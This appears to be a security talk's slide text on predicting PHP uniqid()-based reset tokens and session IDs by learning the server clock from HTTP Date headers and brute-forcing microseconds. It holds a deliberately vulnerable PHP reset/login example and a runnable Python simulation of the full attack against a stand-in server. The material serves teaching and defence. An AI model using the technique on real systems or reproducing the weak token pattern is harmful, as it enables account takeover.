Telling The Time
chris.anley@nccgroup.trust
The Bug

Server generates a time-based:
- Password reset token
- Session id
- Random password
- REST API key
...

For example: PHP uniqid()

PHP manual: "Gets a prefixed unique identifier based on the current time in microseconds."

Then the manual's own notices: CAUTION: NOT SECURE. WARNING: NOT UNIQUE (?!) ... blah blah SECURE blah UNIQUE blah ...
Patterns seen in the wild (what each value actually depends on, in the trailing comment):

$token = uniqid();                          // 57eb8c5bbf47b           -> time
$token = md5(uniqid());                     // 41eced92fef729c756...   -> time
$pwd = substr(md5(uniqid()), 0, 8);         // 41eced92                -> time
srand((double) microtime() * 1000000);      // seed is the microsecond part of the clock
$token = md5(uniqid(rand()));               // time, time
$password = md5(uniqid($session, true));    // time, known, time
$password = md5(uniqid(time(), true));      // time, time, time
A microsecond is a *really* short period of time

"Lightning fast": a lightning flash takes ~200,000 microseconds
"In the blink of an eye": ~100,000 microseconds
"In a flash": ~1,000 microseconds
British Army L115A3 rifle muzzle velocity: 938 m/s = ~1 mm per 1 µs
<?php
// resetPwd.php
date_default_timezone_set("GMT");
...
$pwd = uniqid();                     // the secret is just the server's microsecond clock
file_put_contents('/tmp/pwd', $pwd);
...

<?php
// login.php
$pwd = $_GET['password'];
$target = file_get_contents('/tmp/pwd');
if( strcmp( $pwd, $target ) == 0 ) {      // oracle: tells the attacker when a guess is right
    print("Access Granted<br>");
    print("target: $target\n<BR>");
    print(phpinfo());
}
Learning the server's clock

Could use: ntp, icmp timestamp, snmp, the web app itself...

RFC 2616: origin servers MUST include a Date header field in all responses, except 100, 101, 500, 503 (and servers with no clock).
If there is no clock, the server MUST NOT use Expires or Last-Modified (i.e. its responses are uncacheable).
So almost every response carries the server's time. But Date has a resolution of 1,000,000 µs... (!)
The attack

1. Find a script with similar timing to the password reset script.
2. Request it this many times to find the clock difference.
3. Date resolution is 1,000,000 µs, but there's an edge: the instant the Date value ticks over. Correct for the distance from the edge.
4. Apply this difference to the time of the reset request.
5. Brute force outwards from the prediction (0, 1, -1, 2, -2, 3, -3...).
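The full attack in one runnable script, covering both the uniqid() patterns above and the edge-finding brute force just described. This is an added example, not the deck's own tooling: the "bug server" and the attacker's clock are constructed stand-ins (no network, no real time), the server is assumed to run a fixed number of microseconds ahead of the attacker, every request is assumed to cost a fixed round trip with no jitter (real traces spread, as the histograms later in the deck show), and php_uniqid() reproduces PHP's uniqid() output format (sprintf("%08x%05x", sec, usec), no prefix, more_entropy = false).

```python
import hashlib

US = 1_000_000  # microseconds in a second


def php_uniqid(server_us):
    """Emulate PHP uniqid() with no prefix and more_entropy=false:
    sprintf("%08x%05x", seconds, microseconds). Nothing in it is random."""
    sec, usec = divmod(server_us, US)
    return "%08x%05x" % (sec, usec)


def reset_token(server_us):
    """The deck's $token = md5(uniqid()) pattern: a hash of the clock."""
    return hashlib.md5(php_uniqid(server_us).encode()).hexdigest()


class LocalClock:
    """The attacker's microsecond clock (constructed; no real time used)."""
    def __init__(self, start_us):
        self.us = start_us

    def now(self):
        return self.us

    def tick(self, delta_us):
        self.us += delta_us


class BugServer:
    """Constructed stand-in for the vulnerable host. Its clock runs offset_us
    ahead of the attacker's and each request costs rtt_us of attacker time.
    A request is processed at the server time matching its send time."""
    def __init__(self, offset_us, rtt_us):
        self.offset_us = offset_us
        self.rtt_us = rtt_us
        self.token = None

    def server_time(self, sent_us):
        return sent_us + self.offset_us

    def date_header(self, sent_us):
        # RFC 2616 Date: whole seconds, i.e. 1,000,000 us resolution on its own
        return self.server_time(sent_us) // US

    def reset_password(self, sent_us):
        # resetPwd.php: the token is generated from the server's microsecond clock
        self.token = reset_token(self.server_time(sent_us))

    def login(self, candidate):
        # login.php's strcmp() oracle
        return candidate == self.token


def find_offset(server, clock):
    """Hammer a cheap script until its Date header ticks over. That tick is
    the 'edge': at that instant the server clock was d*US, so the clock
    difference is known to within one request duration, not one second."""
    prev = server.date_header(clock.now())
    while True:
        clock.tick(server.rtt_us)
        d = server.date_header(clock.now())
        if d != prev:
            # the edge lies somewhere between the last two sends; assume halfway
            return d * US - (clock.now() - server.rtt_us // 2)


def spiral():
    """Candidate order from the slide: 0, 1, -1, 2, -2, 3, -3, ..."""
    yield 0
    k = 1
    while True:
        yield k
        yield -k
        k += 1


def recover_token(server, clock, offset_us, max_tries=200_000):
    """Trigger the reset, predict the server microsecond at which uniqid()
    ran, and walk outwards from that guess until login() accepts a token.
    Returns (attempts, microsecond error of the prediction) or None."""
    sent = clock.now()
    server.reset_password(sent)
    clock.tick(server.rtt_us)
    center = sent + offset_us
    for attempts, delta in enumerate(spiral(), start=1):
        if server.login(reset_token(center + delta)):
            return attempts, delta
        if attempts >= max_tries:
            return None


def demo(offset_us=3_599_876_543, rtt_us=200):
    """Metropolitan-distance scenario: ~200 us per request, server ~1 h ahead."""
    server = BugServer(offset_us, rtt_us)
    clock = LocalClock(start_us=1_474_964_000_050_000)
    return recover_token(server, clock, find_offset(server, clock))


if __name__ == "__main__":
    print("attempts, prediction error (us):", demo())
```

With a constant round trip the prediction error is bounded by half a request duration, so the spiral never needs more than about one request duration's worth of guesses; the real-world request counts quoted later in the deck are larger because the round trip jitters and the reset script's own run time differs from the probe script's.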
[Figure: histogram, "Microsecond Req Duration - Leatherhead to Telecity (SOV), Docklands (~30km)", 200 µsec resolution; x-axis request duration (µs), y-axis Frequency]

[Figure: histogram, "Microsecond Error in Brute Force - Leatherhead to Telecity (SOV), Docklands (~30km)", 200 µsec resolution; x-axis error (µs), y-axis Frequency]

[Figure: histogram, "Microsecond Error in Brute Force - Leatherhead to Sydney (ec2), ~17000km", 2000 µsec resolution; x-axis error (µs), y-axis Frequency]
We can brute force the µs time at which a web script will generate a token in:
- LAN: ~500 requests
- Metropolitan area: ~1,000 requests (~30 seconds)
- Antipodes, tiny server: ~40,000 requests (~1 hour)
...without trying very hard...
Improvements:
We haven’t talked about: